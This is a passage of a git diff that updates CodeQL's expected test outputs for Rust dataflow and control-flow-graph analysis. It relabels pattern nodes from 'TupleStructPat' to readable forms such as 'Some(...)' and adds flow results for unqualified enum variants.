{ ... } | | main.rs:123:5:126:5 | match s2 { ... } | main.rs:116:39:127:1 | { ... } | -| main.rs:123:11:123:12 | s2 | main.rs:124:9:124:15 | TupleStructPat | +| main.rs:123:11:123:12 | s2 | main.rs:124:9:124:15 | Some(...) | | main.rs:123:11:123:12 | s2 | main.rs:125:9:125:12 | None | | main.rs:124:14:124:14 | [SSA] n | main.rs:124:25:124:25 | n | | main.rs:124:14:124:14 | n | main.rs:124:14:124:14 | [SSA] n | @@ -120,8 +120,8 @@ localStep | main.rs:136:9:136:10 | [SSA] s2 | main.rs:144:11:144:12 | s2 | | main.rs:136:9:136:10 | s2 | main.rs:136:9:136:10 | [SSA] s2 | | main.rs:136:14:136:30 | ...::B(...) | main.rs:136:9:136:10 | s2 | -| main.rs:137:11:137:12 | s1 | main.rs:138:9:138:25 | TupleStructPat | -| main.rs:137:11:137:12 | s1 | main.rs:139:9:139:25 | TupleStructPat | +| main.rs:137:11:137:12 | s1 | main.rs:138:9:138:25 | ...::A(...) | +| main.rs:137:11:137:12 | s1 | main.rs:139:9:139:25 | ...::B(...) | | main.rs:137:11:137:12 | s1 | main.rs:141:11:141:12 | s1 | | main.rs:138:24:138:24 | [SSA] n | main.rs:138:35:138:35 | n | | main.rs:138:24:138:24 | n | main.rs:138:24:138:24 | [SSA] n | @@ -130,8 +130,8 @@ localStep | main.rs:139:24:139:24 | n | main.rs:139:24:139:24 | [SSA] n | | main.rs:139:30:139:36 | sink(...) | main.rs:137:5:140:5 | match s1 { ... } | | main.rs:141:11:141:12 | s1 | main.rs:142:10:142:46 | ... \| ... | -| main.rs:142:10:142:46 | ... \| ... | main.rs:142:10:142:26 | TupleStructPat | -| main.rs:142:10:142:46 | ... \| ... | main.rs:142:30:142:46 | TupleStructPat | +| main.rs:142:10:142:46 | ... \| ... | main.rs:142:10:142:26 | ...::A(...) | +| main.rs:142:10:142:46 | ... \| ... | main.rs:142:30:142:46 | ...::B(...) | | main.rs:142:10:142:46 | [SSA] [match(true)] phi | main.rs:142:57:142:57 | n | | main.rs:142:25:142:25 | [SSA] [input] [match(true)] phi | main.rs:142:10:142:46 | [SSA] [match(true)] phi | | main.rs:142:25:142:25 | [SSA] n | main.rs:142:25:142:25 | [SSA] [input] [match(true)] phi | @@ -141,8 +141,8 @@ localStep | main.rs:142:45:142:45 | n | main.rs:142:45:142:45 | [SSA] n | | main.rs:142:52:142:58 | sink(...) | main.rs:141:5:143:5 | match s1 { ... } | | main.rs:144:5:147:5 | match s2 { ... } | main.rs:134:48:148:1 | { ... } | -| main.rs:144:11:144:12 | s2 | main.rs:145:9:145:25 | TupleStructPat | -| main.rs:144:11:144:12 | s2 | main.rs:146:9:146:25 | TupleStructPat | +| main.rs:144:11:144:12 | s2 | main.rs:145:9:145:25 | ...::A(...) | +| main.rs:144:11:144:12 | s2 | main.rs:146:9:146:25 | ...::B(...) | | main.rs:145:24:145:24 | [SSA] n | main.rs:145:35:145:35 | n | | main.rs:145:24:145:24 | n | main.rs:145:24:145:24 | [SSA] n | | main.rs:145:30:145:36 | sink(...) | main.rs:144:5:147:5 | match s2 { ... } | @@ -155,8 +155,8 @@ localStep | main.rs:154:9:154:10 | [SSA] s2 | main.rs:162:11:162:12 | s2 | | main.rs:154:9:154:10 | s2 | main.rs:154:9:154:10 | [SSA] s2 | | main.rs:154:14:154:17 | B(...) | main.rs:154:9:154:10 | s2 | -| main.rs:155:11:155:12 | s1 | main.rs:156:9:156:12 | TupleStructPat | -| main.rs:155:11:155:12 | s1 | main.rs:157:9:157:12 | TupleStructPat | +| main.rs:155:11:155:12 | s1 | main.rs:156:9:156:12 | A(...) | +| main.rs:155:11:155:12 | s1 | main.rs:157:9:157:12 | B(...) | | main.rs:155:11:155:12 | s1 | main.rs:159:11:159:12 | s1 | | main.rs:156:11:156:11 | [SSA] n | main.rs:156:22:156:22 | n | | main.rs:156:11:156:11 | n | main.rs:156:11:156:11 | [SSA] n | @@ -165,8 +165,8 @@ localStep | main.rs:157:11:157:11 | n | main.rs:157:11:157:11 | [SSA] n | | main.rs:157:17:157:23 | sink(...) | main.rs:155:5:158:5 | match s1 { ... } | | main.rs:159:11:159:12 | s1 | main.rs:160:10:160:20 | ... \| ... | -| main.rs:160:10:160:20 | ... \| ... | main.rs:160:10:160:13 | TupleStructPat | -| main.rs:160:10:160:20 | ... \| ... | main.rs:160:17:160:20 | TupleStructPat | +| main.rs:160:10:160:20 | ... \| ... | main.rs:160:10:160:13 | A(...) | +| main.rs:160:10:160:20 | ... \| ... | main.rs:160:17:160:20 | B(...) | | main.rs:160:10:160:20 | [SSA] [match(true)] phi | main.rs:160:31:160:31 | n | | main.rs:160:12:160:12 | [SSA] [input] [match(true)] phi | main.rs:160:10:160:20 | [SSA] [match(true)] phi | | main.rs:160:12:160:12 | [SSA] n | main.rs:160:12:160:12 | [SSA] [input] [match(true)] phi | @@ -176,8 +176,8 @@ localStep | main.rs:160:19:160:19 | n | main.rs:160:19:160:19 | [SSA] n | | main.rs:160:26:160:32 | sink(...) | main.rs:159:5:161:5 | match s1 { ... } | | main.rs:162:5:165:5 | match s2 { ... } | main.rs:152:50:166:1 | { ... } | -| main.rs:162:11:162:12 | s2 | main.rs:163:9:163:12 | TupleStructPat | -| main.rs:162:11:162:12 | s2 | main.rs:164:9:164:12 | TupleStructPat | +| main.rs:162:11:162:12 | s2 | main.rs:163:9:163:12 | A(...) | +| main.rs:162:11:162:12 | s2 | main.rs:164:9:164:12 | B(...) | | main.rs:163:11:163:11 | [SSA] n | main.rs:163:22:163:22 | n | | main.rs:163:11:163:11 | n | main.rs:163:11:163:11 | [SSA] n | | main.rs:163:17:163:23 | sink(...) | main.rs:162:5:165:5 | match s2 { ... } | @@ -285,22 +285,38 @@ storeStep | main.rs:118:19:118:19 | 2 | Some | main.rs:118:14:118:20 | Some(...) | | main.rs:135:29:135:38 | source(...) | A | main.rs:135:14:135:39 | ...::A(...) | | main.rs:136:29:136:29 | 2 | B | main.rs:136:14:136:30 | ...::B(...) | +| main.rs:153:16:153:25 | source(...) | A | main.rs:153:14:153:26 | A(...) | +| main.rs:154:16:154:16 | 2 | B | main.rs:154:14:154:17 | B(...) | | main.rs:175:18:175:27 | source(...) | C | main.rs:174:14:176:5 | ...::C {...} | | main.rs:177:41:177:41 | 2 | D | main.rs:177:14:177:43 | ...::D {...} | +| main.rs:195:18:195:27 | source(...) | C | main.rs:194:14:196:5 | C {...} | +| main.rs:197:27:197:27 | 2 | D | main.rs:197:14:197:29 | D {...} | | main.rs:240:27:240:27 | 0 | Some | main.rs:240:22:240:28 | Some(...) | readStep -| main.rs:33:9:33:15 | TupleStructPat | Some | main.rs:33:14:33:14 | _ | -| main.rs:120:9:120:15 | TupleStructPat | Some | main.rs:120:14:120:14 | n | -| main.rs:124:9:124:15 | TupleStructPat | Some | main.rs:124:14:124:14 | n | -| main.rs:138:9:138:25 | TupleStructPat | A | main.rs:138:24:138:24 | n | -| main.rs:139:9:139:25 | TupleStructPat | B | main.rs:139:24:139:24 | n | -| main.rs:142:10:142:26 | TupleStructPat | A | main.rs:142:25:142:25 | n | -| main.rs:142:30:142:46 | TupleStructPat | B | main.rs:142:45:142:45 | n | -| main.rs:145:9:145:25 | TupleStructPat | A | main.rs:145:24:145:24 | n | -| main.rs:146:9:146:25 | TupleStructPat | B | main.rs:146:24:146:24 | n | +| main.rs:33:9:33:15 | Some(...) | Some | main.rs:33:14:33:14 | _ | +| main.rs:120:9:120:15 | Some(...) | Some | main.rs:120:14:120:14 | n | +| main.rs:124:9:124:15 | Some(...) | Some | main.rs:124:14:124:14 | n | +| main.rs:138:9:138:25 | ...::A(...) | A | main.rs:138:24:138:24 | n | +| main.rs:139:9:139:25 | ...::B(...) | B | main.rs:139:24:139:24 | n | +| main.rs:142:10:142:26 | ...::A(...) | A | main.rs:142:25:142:25 | n | +| main.rs:142:30:142:46 | ...::B(...) | B | main.rs:142:45:142:45 | n | +| main.rs:145:9:145:25 | ...::A(...) | A | main.rs:145:24:145:24 | n | +| main.rs:146:9:146:25 | ...::B(...) | B | main.rs:146:24:146:24 | n | +| main.rs:156:9:156:12 | A(...) | A | main.rs:156:11:156:11 | n | +| main.rs:157:9:157:12 | B(...) | B | main.rs:157:11:157:11 | n | +| main.rs:160:10:160:13 | A(...) | A | main.rs:160:12:160:12 | n | +| main.rs:160:17:160:20 | B(...) | B | main.rs:160:19:160:19 | n | +| main.rs:163:9:163:12 | A(...) | A | main.rs:163:11:163:11 | n | +| main.rs:164:9:164:12 | B(...) | B | main.rs:164:11:164:11 | n | | main.rs:179:9:179:38 | ...::C {...} | C | main.rs:179:36:179:36 | n | | main.rs:180:9:180:38 | ...::D {...} | D | main.rs:180:36:180:36 | n | | main.rs:183:10:183:39 | ...::C {...} | C | main.rs:183:37:183:37 | n | | main.rs:183:43:183:72 | ...::D {...} | D | main.rs:183:70:183:70 | n | | main.rs:186:9:186:38 | ...::C {...} | C | main.rs:186:36:186:36 | n | | main.rs:187:9:187:38 | ...::D {...} | D | main.rs:187:36:187:36 | n | +| main.rs:199:9:199:24 | C {...} | C | main.rs:199:22:199:22 | n | +| main.rs:200:9:200:24 | D {...} | D | main.rs:200:22:200:22 | n | +| main.rs:203:10:203:25 | C {...} | C | main.rs:203:23:203:23 | n | +| main.rs:203:29:203:44 | D {...} | D | main.rs:203:42:203:42 | n | +| main.rs:206:9:206:24 | C {...} | C | main.rs:206:22:206:22 | n | +| main.rs:207:9:207:24 | D {...} | D | main.rs:207:22:207:22 | n | diff --git a/rust/ql/test/library-tests/dataflow/local/inline-flow.expected b/rust/ql/test/library-tests/dataflow/local/inline-flow.expected index bfafa38c3ff..7ec1b3d8916 100644 --- a/rust/ql/test/library-tests/dataflow/local/inline-flow.expected +++ b/rust/ql/test/library-tests/dataflow/local/inline-flow.expected @@ -5,17 +5,24 @@ edges | main.rs:31:13:31:21 | source(...) | main.rs:36:10:36:10 | b | provenance | | | main.rs:45:15:45:23 | source(...) | main.rs:47:10:47:10 | b | provenance | | | main.rs:53:9:53:17 | source(...) | main.rs:54:10:54:10 | i | provenance | | -| main.rs:117:14:117:29 | Some(...) [Some] | main.rs:120:9:120:15 | TupleStructPat [Some] | provenance | | +| main.rs:117:14:117:29 | Some(...) [Some] | main.rs:120:9:120:15 | Some(...) [Some] | provenance | | | main.rs:117:19:117:28 | source(...) | main.rs:117:14:117:29 | Some(...) [Some] | provenance | | -| main.rs:120:9:120:15 | TupleStructPat [Some] | main.rs:120:14:120:14 | n | provenance | | +| main.rs:120:9:120:15 | Some(...) [Some] | main.rs:120:14:120:14 | n | provenance | | | main.rs:120:14:120:14 | n | main.rs:120:25:120:25 | n | provenance | | -| main.rs:135:14:135:39 | ...::A(...) [A] | main.rs:138:9:138:25 | TupleStructPat [A] | provenance | | -| main.rs:135:14:135:39 | ...::A(...) [A] | main.rs:142:10:142:26 | TupleStructPat [A] | provenance | | +| main.rs:135:14:135:39 | ...::A(...) [A] | main.rs:138:9:138:25 | ...::A(...) [A] | provenance | | +| main.rs:135:14:135:39 | ...::A(...) [A] | main.rs:142:10:142:26 | ...::A(...) [A] | provenance | | | main.rs:135:29:135:38 | source(...) | main.rs:135:14:135:39 | ...::A(...) [A] | provenance | | -| main.rs:138:9:138:25 | TupleStructPat [A] | main.rs:138:24:138:24 | n | provenance | | +| main.rs:138:9:138:25 | ...::A(...) [A] | main.rs:138:24:138:24 | n | provenance | | | main.rs:138:24:138:24 | n | main.rs:138:35:138:35 | n | provenance | | -| main.rs:142:10:142:26 | TupleStructPat [A] | main.rs:142:25:142:25 | n | provenance | | +| main.rs:142:10:142:26 | ...::A(...) [A] | main.rs:142:25:142:25 | n | provenance | | | main.rs:142:25:142:25 | n | main.rs:142:57:142:57 | n | provenance | | +| main.rs:153:14:153:26 | A(...) [A] | main.rs:156:9:156:12 | A(...) [A] | provenance | | +| main.rs:153:14:153:26 | A(...) [A] | main.rs:160:10:160:13 | A(...) [A] | provenance | | +| main.rs:153:16:153:25 | source(...) | main.rs:153:14:153:26 | A(...) [A] | provenance | | +| main.rs:156:9:156:12 | A(...) [A] | main.rs:156:11:156:11 | n | provenance | | +| main.rs:156:11:156:11 | n | main.rs:156:22:156:22 | n | provenance | | +| main.rs:160:10:160:13 | A(...) [A] | main.rs:160:12:160:12 | n | provenance | | +| main.rs:160:12:160:12 | n | main.rs:160:31:160:31 | n | provenance | | | main.rs:174:14:176:5 | ...::C {...} [C] | main.rs:179:9:179:38 | ...::C {...} [C] | provenance | | | main.rs:174:14:176:5 | ...::C {...} [C] | main.rs:183:10:183:39 | ...::C {...} [C] | provenance | | | main.rs:175:18:175:27 | source(...) | main.rs:174:14:176:5 | ...::C {...} [C] | provenance | | @@ -23,6 +30,13 @@ edges | main.rs:179:36:179:36 | n | main.rs:179:48:179:48 | n | provenance | | | main.rs:183:10:183:39 | ...::C {...} [C] | main.rs:183:37:183:37 | n | provenance | | | main.rs:183:37:183:37 | n | main.rs:183:83:183:83 | n | provenance | | +| main.rs:194:14:196:5 | C {...} [C] | main.rs:199:9:199:24 | C {...} [C] | provenance | | +| main.rs:194:14:196:5 | C {...} [C] | main.rs:203:10:203:25 | C {...} [C] | provenance | | +| main.rs:195:18:195:27 | source(...) | main.rs:194:14:196:5 | C {...} [C] | provenance | | +| main.rs:199:9:199:24 | C {...} [C] | main.rs:199:22:199:22 | n | provenance | | +| main.rs:199:22:199:22 | n | main.rs:199:34:199:34 | n | provenance | | +| main.rs:203:10:203:25 | C {...} [C] | main.rs:203:23:203:23 | n | provenance | | +| main.rs:203:23:203:23 | n | main.rs:203:55:203:55 | n | provenance | | nodes | main.rs:15:10:15:18 | source(...) | semmle.label | source(...) | | main.rs:19:13:19:21 | source(...) | semmle.label | source(...) | @@ -37,17 +51,25 @@ nodes | main.rs:54:10:54:10 | i | semmle.label | i | | main.rs:117:14:117:29 | Some(...) [Some] | semmle.label | Some(...) [Some] | | main.rs:117:19:117:28 | source(...) | semmle.label | source(...) | -| main.rs:120:9:120:15 | TupleStructPat [Some] | semmle.label | TupleStructPat [Some] | +| main.rs:120:9:120:15 | Some(...) [Some] | semmle.label | Some(...) [Some] | | main.rs:120:14:120:14 | n | semmle.label | n | | main.rs:120:25:120:25 | n | semmle.label | n | | main.rs:135:14:135:39 | ...::A(...) [A] | semmle.label | ...::A(...) [A] | | main.rs:135:29:135:38 | source(...) | semmle.label | source(...) | -| main.rs:138:9:138:25 | TupleStructPat [A] | semmle.label | TupleStructPat [A] | +| main.rs:138:9:138:25 | ...::A(...) [A] | semmle.label | ...::A(...) [A] | | main.rs:138:24:138:24 | n | semmle.label | n | | main.rs:138:35:138:35 | n | semmle.label | n | -| main.rs:142:10:142:26 | TupleStructPat [A] | semmle.label | TupleStructPat [A] | +| main.rs:142:10:142:26 | ...::A(...) [A] | semmle.label | ...::A(...) [A] | | main.rs:142:25:142:25 | n | semmle.label | n | | main.rs:142:57:142:57 | n | semmle.label | n | +| main.rs:153:14:153:26 | A(...) [A] | semmle.label | A(...) [A] | +| main.rs:153:16:153:25 | source(...) | semmle.label | source(...) | +| main.rs:156:9:156:12 | A(...) [A] | semmle.label | A(...) [A] | +| main.rs:156:11:156:11 | n | semmle.label | n | +| main.rs:156:22:156:22 | n | semmle.label | n | +| main.rs:160:10:160:13 | A(...) [A] | semmle.label | A(...) [A] | +| main.rs:160:12:160:12 | n | semmle.label | n | +| main.rs:160:31:160:31 | n | semmle.label | n | | main.rs:174:14:176:5 | ...::C {...} [C] | semmle.label | ...::C {...} [C] | | main.rs:175:18:175:27 | source(...) | semmle.label | source(...) | | main.rs:179:9:179:38 | ...::C {...} [C] | semmle.label | ...::C {...} [C] | @@ -56,8 +78,20 @@ nodes | main.rs:183:10:183:39 | ...::C {...} [C] | semmle.label | ...::C {...} [C] | | main.rs:183:37:183:37 | n | semmle.label | n | | main.rs:183:83:183:83 | n | semmle.label | n | +| main.rs:194:14:196:5 | C {...} [C] | semmle.label | C {...} [C] | +| main.rs:195:18:195:27 | source(...) | semmle.label | source(...) | +| main.rs:199:9:199:24 | C {...} [C] | semmle.label | C {...} [C] | +| main.rs:199:22:199:22 | n | semmle.label | n | +| main.rs:199:34:199:34 | n | semmle.label | n | +| main.rs:203:10:203:25 | C {...} [C] | semmle.label | C {...} [C] | +| main.rs:203:23:203:23 | n | semmle.label | n | +| main.rs:203:55:203:55 | n | semmle.label | n | subpaths testFailures +| main.rs:156:22:156:22 | n | Fixed missing result: hasValueFlow=16 | +| main.rs:160:31:160:31 | n | Fixed missing result: hasValueFlow=16 | +| main.rs:199:34:199:34 | n | Fixed missing result: hasValueFlow=18 | +| main.rs:203:55:203:55 | n | Fixed missing result: hasValueFlow=18 | #select | main.rs:15:10:15:18 | source(...) | main.rs:15:10:15:18 | source(...) | main.rs:15:10:15:18 | source(...) | $@ | main.rs:15:10:15:18 | source(...) | source(...) | | main.rs:20:10:20:10 | s | main.rs:19:13:19:21 | source(...) | main.rs:20:10:20:10 | s | $@ | main.rs:19:13:19:21 | source(...) | source(...) | @@ -68,5 +102,9 @@ testFailures | main.rs:120:25:120:25 | n | main.rs:117:19:117:28 | source(...) | main.rs:120:25:120:25 | n | $@ | main.rs:117:19:117:28 | source(...) | source(...) | | main.rs:138:35:138:35 | n | main.rs:135:29:135:38 | source(...) | main.rs:138:35:138:35 | n | $@ | main.rs:135:29:135:38 | source(...) | source(...) | | main.rs:142:57:142:57 | n | main.rs:135:29:135:38 | source(...) | main.rs:142:57:142:57 | n | $@ | main.rs:135:29:135:38 | source(...) | source(...) | +| main.rs:156:22:156:22 | n | main.rs:153:16:153:25 | source(...) | main.rs:156:22:156:22 | n | $@ | main.rs:153:16:153:25 | source(...) | source(...) | +| main.rs:160:31:160:31 | n | main.rs:153:16:153:25 | source(...) | main.rs:160:31:160:31 | n | $@ | main.rs:153:16:153:25 | source(...) | source(...) | | main.rs:179:48:179:48 | n | main.rs:175:18:175:27 | source(...) | main.rs:179:48:179:48 | n | $@ | main.rs:175:18:175:27 | source(...) | source(...) | | main.rs:183:83:183:83 | n | main.rs:175:18:175:27 | source(...) | main.rs:183:83:183:83 | n | $@ | main.rs:175:18:175:27 | source(...) | source(...) | +| main.rs:199:34:199:34 | n | main.rs:195:18:195:27 | source(...) | main.rs:199:34:199:34 | n | $@ | main.rs:195:18:195:27 | source(...) | source(...) | +| main.rs:203:55:203:55 | n | main.rs:195:18:195:27 | source(...) | main.rs:203:55:203:55 | n | $@ | main.rs:195:18:195:27 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/variables/Cfg.expected b/rust/ql/test/library-tests/variables/Cfg.expected index 6b979eac0da..b55c0e9d04c 100644 --- a/rust/ql/test/library-tests/variables/Cfg.expected +++ b/rust/ql/test/library-tests/variables/Cfg.expected @@ -197,10 +197,10 @@ edges | variables.rs:85:32:85:39 | "Hello!" | variables.rs:85:19:85:40 | ...::from(...) | | | variables.rs:87:5:90:5 | if ... {...} | variables.rs:84:19:91:1 | { ... } | | | variables.rs:87:8:88:12 | let ... = s1 | variables.rs:88:11:88:12 | s1 | | -| variables.rs:87:12:87:23 | TupleStructPat | variables.rs:87:5:90:5 | if ... {...} | no-match | -| variables.rs:87:12:87:23 | TupleStructPat | variables.rs:87:17:87:22 | s2 | match | +| variables.rs:87:12:87:23 | Some(...) | variables.rs:87:5:90:5 | if ... {...} | no-match | +| variables.rs:87:12:87:23 | Some(...) | variables.rs:87:17:87:22 | s2 | match | | variables.rs:87:17:87:22 | s2 | variables.rs:89:9:89:22 | ExprStmt | match | -| variables.rs:88:11:88:12 | s1 | variables.rs:87:12:87:23 | TupleStructPat | | +| variables.rs:88:11:88:12 | s1 | variables.rs:87:12:87:23 | Some(...) | | | variables.rs:88:14:90:5 | { ... } | variables.rs:87:5:90:5 | if ... {...} | | | variables.rs:89:9:89:17 | print_str | variables.rs:89:19:89:20 | s2 | | | variables.rs:89:9:89:21 | print_str(...) | variables.rs:88:14:90:5 | { ... } | | @@ -210,11 +210,11 @@ edges | variables.rs:93:1:99:1 | exit fn let_pattern4 (normal) | variables.rs:93:1:99:1 | exit fn let_pattern4 | | | variables.rs:93:19:99:1 | { ... } | variables.rs:93:1:99:1 | exit fn let_pattern4 (normal) | | | variables.rs:94:5:97:10 | let ... = ... else {...} | variables.rs:94:34:94:37 | Some | | -| variables.rs:94:9:94:16 | TupleStructPat | variables.rs:94:14:94:15 | x5 | match | -| variables.rs:94:9:94:16 | TupleStructPat | variables.rs:96:13:96:19 | MacroStmts | no-match | +| variables.rs:94:9:94:16 | Some(...) | variables.rs:94:14:94:15 | x5 | match | +| variables.rs:94:9:94:16 | Some(...) | variables.rs:96:13:96:19 | MacroStmts | no-match | | variables.rs:94:14:94:15 | x5 | variables.rs:98:5:98:18 | ExprStmt | match | | variables.rs:94:34:94:37 | Some | variables.rs:94:39:94:42 | "x5" | | -| variables.rs:94:34:94:43 | Some(...) | variables.rs:94:9:94:16 | TupleStructPat | | +| variables.rs:94:34:94:43 | Some(...) | variables.rs:94:9:94:16 | Some(...) | | | variables.rs:94:39:94:42 | "x5" | variables.rs:94:34:94:43 | Some(...) | | | variables.rs:96:13:96:19 | "not yet implemented" | variables.rs:96:13:96:19 | ...::panic(...) | | | variables.rs:96:13:96:19 | ...::panic | variables.rs:96:13:96:19 | "not yet implemented" | | @@ -237,10 +237,10 @@ edges | variables.rs:102:32:102:39 | "Hello!" | variables.rs:102:19:102:40 | ...::from(...) | | | variables.rs:104:5:107:5 | while ... { ... } | variables.rs:101:19:108:1 | { ... } | | | variables.rs:104:11:105:12 | let ... = s1 | variables.rs:105:11:105:12 | s1 | | -| variables.rs:104:15:104:26 | TupleStructPat | variables.rs:104:5:107:5 | while ... { ... } | no-match | -| variables.rs:104:15:104:26 | TupleStructPat | variables.rs:104:20:104:25 | s2 | match | +| variables.rs:104:15:104:26 | Some(...) | variables.rs:104:5:107:5 | while ... { ... } | no-match | +| variables.rs:104:15:104:26 | Some(...) | variables.rs:104:20:104:25 | s2 | match | | variables.rs:104:20:104:25 | s2 | variables.rs:106:9:106:22 | ExprStmt | match | -| variables.rs:105:11:105:12 | s1 | variables.rs:104:15:104:26 | TupleStructPat | | +| variables.rs:105:11:105:12 | s1 | variables.rs:104:15:104:26 | Some(...) | | | variables.rs:105:14:107:5 | { ... } | variables.rs:104:11:105:12 | let ... = s1 | | | variables.rs:106:9:106:17 | print_str | variables.rs:106:19:106:20 | s2 | | | variables.rs:106:9:106:21 | print_str(...) | variables.rs:105:14:107:5 | { ... } | | @@ -259,17 +259,17 @@ edges | variables.rs:112:14:112:15 | 10 | variables.rs:112:9:112:10 | y1 | | | variables.rs:114:5:122:5 | ExprStmt | variables.rs:114:11:114:12 | x6 | | | variables.rs:114:5:122:5 | match x6 { ... } | variables.rs:124:5:124:18 | ExprStmt | | -| variables.rs:114:11:114:12 | x6 | variables.rs:115:9:115:16 | TupleStructPat | | -| variables.rs:115:9:115:16 | TupleStructPat | variables.rs:115:14:115:15 | 50 | match | -| variables.rs:115:9:115:16 | TupleStructPat | variables.rs:116:9:116:16 | TupleStructPat | no-match | +| variables.rs:114:11:114:12 | x6 | variables.rs:115:9:115:16 | Some(...) | | +| variables.rs:115:9:115:16 | Some(...) | variables.rs:115:14:115:15 | 50 | match | +| variables.rs:115:9:115:16 | Some(...) | variables.rs:116:9:116:16 | Some(...) | no-match | | variables.rs:115:14:115:15 | 50 | variables.rs:115:14:115:15 | 50 | | | variables.rs:115:14:115:15 | 50 | variables.rs:115:21:115:29 | print_str | match | -| variables.rs:115:14:115:15 | 50 | variables.rs:116:9:116:16 | TupleStructPat | no-match | +| variables.rs:115:14:115:15 | 50 | variables.rs:116:9:116:16 | Some(...) | no-match | | variables.rs:115:21:115:29 | print_str | variables.rs:115:31:115:38 | "Got 50" | | | variables.rs:115:21:115:39 | print_str(...) | variables.rs:114:5:122:5 | match x6 { ... } | | | variables.rs:115:31:115:38 | "Got 50" | variables.rs:115:21:115:39 | print_str(...) | | -| variables.rs:116:9:116:16 | TupleStructPat | variables.rs:116:14:116:15 | y1 | match | -| variables.rs:116:9:116:16 | TupleStructPat | variables.rs:121:9:121:12 | None | no-match | +| variables.rs:116:9:116:16 | Some(...) | variables.rs:116:14:116:15 | y1 | match | +| variables.rs:116:9:116:16 | Some(...) | variables.rs:121:9:121:12 | None | no-match | | variables.rs:116:14:116:15 | y1 | variables.rs:119:13:119:21 | print_i64 | match | | variables.rs:118:9:120:9 | { ... } | variables.rs:114:5:122:5 | match x6 { ... } | | | variables.rs:119:13:119:21 | print_i64 | variables.rs:119:23:119:24 | y1 | | @@ -404,12 +404,12 @@ edges | variables.rs:189:18:189:33 | ...::Left(...) | variables.rs:189:9:189:14 | either | | | variables.rs:189:31:189:32 | 32 | variables.rs:189:18:189:33 | ...::Left(...) | | | variables.rs:190:5:193:5 | match either { ... } | variables.rs:188:21:194:1 | { ... } | | -| variables.rs:190:11:190:16 | either | variables.rs:191:9:191:24 | TupleStructPat | | -| variables.rs:191:9:191:24 | TupleStructPat | variables.rs:191:22:191:23 | a3 | match | -| variables.rs:191:9:191:24 | TupleStructPat | variables.rs:191:28:191:44 | TupleStructPat | no-match | +| variables.rs:190:11:190:16 | either | variables.rs:191:9:191:24 | ...::Left(...) | | +| variables.rs:191:9:191:24 | ...::Left(...) | variables.rs:191:22:191:23 | a3 | match | +| variables.rs:191:9:191:24 | ...::Left(...) | variables.rs:191:28:191:44 | ...::Right(...) | no-match | | variables.rs:191:9:191:44 | [match(true)] ... \| ... | variables.rs:192:16:192:24 | print_i64 | match | | variables.rs:191:22:191:23 | a3 | variables.rs:191:9:191:44 | [match(true)] ... \| ... | match | -| variables.rs:191:28:191:44 | TupleStructPat | variables.rs:191:42:191:43 | a3 | match | +| variables.rs:191:28:191:44 | ...::Right(...) | variables.rs:191:42:191:43 | a3 | match | | variables.rs:191:42:191:43 | a3 | variables.rs:191:9:191:44 | [match(true)] ... \| ... | match | | variables.rs:192:16:192:24 | print_i64 | variables.rs:192:26:192:27 | a3 | | | variables.rs:192:16:192:28 | print_i64(...) | variables.rs:190:5:193:5 | match either { ... } | | @@ -424,47 +424,47 @@ edges | variables.rs:203:34:203:35 | 62 | variables.rs:203:14:203:36 | ...::Second(...) | | | variables.rs:204:5:207:5 | ExprStmt | variables.rs:204:11:204:12 | tv | | | variables.rs:204:5:207:5 | match tv { ... } | variables.rs:208:5:211:5 | ExprStmt | | -| variables.rs:204:11:204:12 | tv | variables.rs:205:9:205:30 | TupleStructPat | | -| variables.rs:205:9:205:30 | TupleStructPat | variables.rs:205:28:205:29 | a4 | match | -| variables.rs:205:9:205:30 | TupleStructPat | variables.rs:205:34:205:56 | TupleStructPat | no-match | +| variables.rs:204:11:204:12 | tv | variables.rs:205:9:205:30 | ...::First(...) | | +| variables.rs:205:9:205:30 | ...::First(...) | variables.rs:205:28:205:29 | a4 | match | +| variables.rs:205:9:205:30 | ...::First(...) | variables.rs:205:34:205:56 | ...::Second(...) | no-match | | variables.rs:205:9:205:81 | [match(true)] ... \| ... \| ... | variables.rs:206:16:206:24 | print_i64 | match | | variables.rs:205:28:205:29 | a4 | variables.rs:205:9:205:81 | [match(true)] ... \| ... \| ... | match | -| variables.rs:205:34:205:56 | TupleStructPat | variables.rs:205:54:205:55 | a4 | match | -| variables.rs:205:34:205:56 | TupleStructPat | variables.rs:205:60:205:81 | TupleStructPat | no-match | +| variables.rs:205:34:205:56 | ...::Second(...) | variables.rs:205:54:205:55 | a4 | match | +| variables.rs:205:34:205:56 | ...::Second(...) | variables.rs:205:60:205:81 | ...::Third(...) | no-match | | variables.rs:205:54:205:55 | a4 | variables.rs:205:9:205:81 | [match(true)] ... \| ... \| ... | match | -| variables.rs:205:60:205:81 | TupleStructPat | variables.rs:205:79:205:80 | a4 | match | +| variables.rs:205:60:205:81 | ...::Third(...) | variables.rs:205:79:205:80 | a4 | match | | variables.rs:205:79:205:80 | a4 | variables.rs:205:9:205:81 | [match(true)] ... \| ... \| ... | match | | variables.rs:206:16:206:24 | print_i64 | variables.rs:206:26:206:27 | a4 | | | variables.rs:206:16:206:28 | print_i64(...) | variables.rs:204:5:207:5 | match tv { ... } | | | variables.rs:206:26:206:27 | a4 | variables.rs:206:16:206:28 | print_i64(...) | | | variables.rs:208:5:211:5 | ExprStmt | variables.rs:208:11:208:12 | tv | | | variables.rs:208:5:211:5 | match tv { ... } | variables.rs:212:11:212:12 | tv | | -| variables.rs:208:11:208:12 | tv | variables.rs:209:10:209:31 | TupleStructPat | | +| variables.rs:208:11:208:12 | tv | variables.rs:209:10:209:31 | ...::First(...) | | | variables.rs:209:9:209:83 | [match(true)] ... \| ... | variables.rs:210:16:210:24 | print_i64 | match | -| variables.rs:209:10:209:31 | TupleStructPat | variables.rs:209:29:209:30 | a5 | match | -| variables.rs:209:10:209:31 | TupleStructPat | variables.rs:209:35:209:57 | TupleStructPat | no-match | -| variables.rs:209:10:209:57 | [match(false)] ... \| ... | variables.rs:209:62:209:83 | TupleStructPat | no-match | +| variables.rs:209:10:209:31 | ...::First(...) | variables.rs:209:29:209:30 | a5 | match | +| variables.rs:209:10:209:31 | ...::First(...) | variables.rs:209:35:209:57 | ...::Second(...) | no-match | +| variables.rs:209:10:209:57 | [match(false)] ... \| ... | variables.rs:209:62:209:83 | ...::Third(...) | no-match | | variables.rs:209:10:209:57 | [match(true)] ... \| ... | variables.rs:209:9:209:83 | [match(true)] ... \| ... | match | | variables.rs:209:29:209:30 | a5 | variables.rs:209:10:209:57 | [match(true)] ... \| ... | match | -| variables.rs:209:35:209:57 | TupleStructPat | variables.rs:209:10:209:57 | [match(false)] ... \| ... | no-match | -| variables.rs:209:35:209:57 | 